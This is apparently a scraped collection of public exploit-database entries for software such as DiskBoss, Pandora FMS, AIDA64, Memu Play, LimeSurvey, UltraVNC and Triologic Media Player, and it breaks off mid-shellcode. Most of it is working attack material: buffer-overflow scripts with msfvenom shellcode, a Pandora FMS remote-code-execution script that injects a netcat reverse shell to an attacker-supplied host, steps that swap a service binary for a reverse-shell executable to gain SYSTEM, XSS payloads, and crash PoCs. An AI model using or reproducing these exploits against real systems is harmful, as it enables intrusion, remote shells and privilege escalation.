ISHACK AI BOT

# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC) # Vendor Homepage: https://www.diskboss.com/ # Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe # Exploit Author: Paras Bhatia # Discovery Date: 2020-04-01 # Vulnerable Software: DiskBoss # Version: 7.7.14 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: DiskbossLCE.py # 2.- Copy content to clipboard # 3.- Turn off DEP for diskbsg.exe # 4.- Open "diskboss.exe" (diskbsg.exe) # 5.- Go to "Command" > Search Files # 6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares") # 7.- Click on " Add Input Directory" # 8.- Paste ClipBoard into the "Directory" field # 9.- Click on OK # 10.- Calc.exe runs ################################################################################################################################################# #Python "DiskbossLCE.py" Code: f = open("DiskbossLCE.txt", "w") # Message= 0x650EA4CA : jmp ebx | [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll) jmpebx = "\xCA\xA4\x0E\x65" # msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "\x0a\x0d\x2f\x5c\x00" buf = "" buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73" buf += "\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b" buf += "\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51" buf += "\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77" buf += "\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53" buf += "\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f" buf += "\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71" buf += "\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c" buf += "\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67" buf += "\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31" buf += "\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51" buf += "\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51" buf += "\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58" buf += "\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d" buf += "\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42" buf += "\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46" buf += "\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43" buf += "\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30" buf += "\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73" buf += "\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f" buf += "\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31" buf += "\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30" buf += "\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32" buf += "\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65" buf += "\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f" buf += "\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a" buf += "\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53" buf += "\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53" buf += "\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36" buf += "\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41" junk1 = "A" * 4096 junk2 = "C" * 1196 payload= junk1 + jmpebx + junk2 + buf f.write(payload) f.close()

# Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution # Build: PC170324 - MR 0 # Date: 2020-03-30 # Exploit Author: Basim Alabdullah # Vendor homepage: http://pandorafms.org/ # Version: 7.0 # Software link: https://pandorafms.org/features/free-download-monitoring-software/ # Tested on: CentOS # # Authenticated Remote Code Execution # # Vulnerable file: extension/net_tools.php # Vulnerable Code: # # $traceroute = whereis_the_command ('traceroute'); # if (empty($traceroute)) { # ui_print_error_message(__('Traceroute executable does not exist.')); # } # else { # echo "<h3>".__("Traceroute to "). $ip. "</h3>"; # echo "<pre>"; # ----> echo system ("$traceroute $ip"); # echo "</pre>"; # # <?php error_reporting(0); $username = $argv[2]; $password = $argv[3]; $url = $argv[1]."/index.php?login=1"; $postinfo = "nick=".$username."&pass=".$password."&login_button=Login"; $attackerip = $argv[4]; $attackerport = $argv[5]; $payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}"; if(!empty($argv[1])) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo); curl_exec($ch); curl_close($ch); $ch1 = curl_init(); curl_setopt($ch1, CURLOPT_HEADER, false); curl_setopt($ch1, CURLOPT_NOBODY, false); curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools"); curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp"); curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch1, CURLOPT_REFERER, $url); curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch1, CURLOPT_POST, 1); curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute"); curl_exec($ch1); curl_close($ch1); echo $payload."\n"; } else{ echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n"; } ?> # # Persistent Cross-Site Scripting. # The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859&#039;;document.location=1//981xgeu3m in the application's response. # # GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 # HTTP/1.1 # Host: pandorafms.host # User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 # Accept: text/html, */*; q=0.01 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events # X-Requested-With: XMLHttpRequest # Connection: close # Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1

# Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH) # Date: 2020-04-02 # Exploit Author: Hodorsec # Version: v6.20.5300 # Software Link: http://download.aida64.com/aida64engineer620.exe # Vendor Homepage: https://www.aida64.com/products/aida64-engineer # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be generated # - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c) # - Open AIDA64 Engineer # - First, click on "File", "Preferences" # - Click menu "Report", "Report File" # - Enter a long string in the field "File name" # - Set "File extension" to automatic, as by default # - Click OK # - Second, in the main menu, click "Report" which shows the "Report Wizard" # - Next, "System Summary only", next, "Plain Text", Finish # - Click the button "Send In E-mail" # - Check results # WinDBG initial crash output using only A's: # (994.998): Access violation - code c0000005 (!!! second chance !!!) # eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000 # eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 # ntdll!RtlAcquireSRWLockShared+0x1a: # 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=???????? #!/usr/bin/python import sys,struct filename = "aida64_engineer_poc.txt" # Maximum length maxlen = 5000 # Shellcode, using alphanum chars due to bytes considered to be bad above \x7f # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax # Payload size: 440 bytes shellcode = ( "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30" "\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43" "\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b" "\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52" "\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c" "\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a" "\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30" "\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78" "\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70" "\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32" "\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f" "\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79" "\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d" "\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57" "\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38" "\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38" "\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51" "\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52" "\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71" "\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55" "\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b" "\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d" "\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a" "\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66" "\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75" "\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53" "\x55\x65\x50\x41\x41" ) # Align the registers # ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d align_eax = ( "\x56" # PUSH ESI "\x58" # POP EAX "\x66\x05\x3f\x10" # ADD AX,0x103f # EAX = 0x04aaffff "\x40" # INC EAX # EAX = 0x04ab0000 "\x66\x05\x01\x7F" # ADD AX,0x7f01 # EAX = 0x04ab7f01 "\x66\x05\x6b\x7c" # ADD AX,0x7c6b # EAX = 0x04abfb6c "\x50" # PUSH EAX ) # Offsets crash_ebp = 307 crash_esi = 1583 crash_seh = 319 crash_nseh = crash_seh - 4 # Variables ascii_nop = "\x47" # Doesn't do anything particular for this program nops = ascii_nop * 32 # ASCII NOP's amount # Prefix prefix = "A" * crash_nseh nseh = "\x71\x06\x70\x04" # JNO SHORT # JO SHORT # Jump over NSEH/SEH seh = struct.pack("<L", 0x0121076e) # POP POP RET # aida64.exe suffix = align_eax # Align registers to execute shellcode suffix += nops # Some ASCII friendly NOP's suffix += shellcode # Magic! suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler # Concatenate string for payload payload = prefix + nseh + seh + suffix # Put it all together try: file = open(filename,"wb") file.write(payload) file.close() print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully" except: print "[!] Error creating file!" sys.exit(0)

# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions # Discovery by: chuyreds # Discovery Date: 2020-03-08 # Vendor Homepage: https://www.memuplay.com/ # Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release # Tested Version: 7.1.3 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Description: # Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions # Prerequisites # Local, Low privilege access with restart capabilities # Details # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. # A low privilege account is able to rename the MemuService.exe file located in this same path and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) Se procesaron correctamente 1 archivos; error al procesar 0 archivos C:\>sc qc MEmuSVC [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MEmuSVC TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MEmuSVC DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 443 service apache2 start 3. Download malicious .exe on victim machine Open browser to http://192.168.1.130/MemuService.exe and download 4. Overwrite file and copy malicious .exe. Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system

# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe # Tested Version: 4.2.2.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Product Key Explorer and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Key' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"

# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC) # Exploit Author: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: https://www.spotauditor.com/ # Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe # Tested Version: 5.3.4 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, # including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook # smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 # top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run SpotAuditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"

# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC) # Discovery by: 0xMoHassan # Date: 2020-04-04 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.2.0.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows XP - SP3 # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, # and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that # a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing # software significantly reduces the total cost of network management in enterprise environments by enabling # IT personnel and systems administrators gather a wide range of information from all the computers in the network without # installing server-side applications on these computers and create a report of potential problems that were found. # PoC # 1.Run the python script, it will create a new file "POC.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of POC.txt into the Field: 'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"

# Exploit Title: Frigate 3.36 - Denial of Service (PoC) # Date: 2020-04-05 # Exploit Author: inter # Vendor Homepage: http://www.Frigate3.com/ # Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe # Vulnerable Software: Firgate # Version: 3.36 # Vulnerability Type: Denial of Service (DoS) Local # Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English) #Steps to Produce the Crash: # 1.- Run python code: crash.py # 2.- Copy content to clipboard # 3.- Open "Frigate3.exe" # 4.- Go to "Disk" > Find Computer # 5.- Paste ClipBoard into the "Computer Name:" field # 6.- Click on OK # 7.- Crashed #Python "crash.py" Code: buffer = "\x41" * 2000 f = open ("Frigate.txt", "w") f.write(buffer) f.close()

# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py #2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Repeater host" Paste Clipboard #6.- Click on "OK" #7.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w') f.write(cod) f.close()

# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11456 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. Vulnerable Parameter : "title" # POC POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 Host: TARGET Content-Length: 374 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D Connection: close YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=

# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py #2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Password" Paste Clipboard #6.- Click on "OK" #7.- Click on "Propieties" #8.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w') f.write(cod) f.close()

# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py #2.- Open UltraViewer_VNCServer.txt and copy content to clipboard #3.- Open UltraVNC Viewer #4.- In "VNC Server" Paste Clipboard #5.- Click on "Connect" #6.- Crashed cod = "\x41" * 256 f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w') f.write(cod) f.close()

# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.emtec.com # Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe # Tested Version: 7.25.5 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py #2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select File > Create SSH Key Files... #5.- Select "Private key file:" field erease and Paste ClipBoard #6.- Click on "Create public/private key files..." #7.- Crashed buffer = "\x41" * 2000 f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w") f.write(buffer) f.close()

# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) # Date: 2020-04-04 # Author: Felipe Winsnes # Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html # Version: 8 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file called "poc.m3l". # 2.- Open the Application. # 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. # 4.- Click on the bottom-right button that displays an arrow and has written "LIST". # 5.- Select the file "poc.m3l". # 6.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread # Payload size: 512 bytes buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" buf 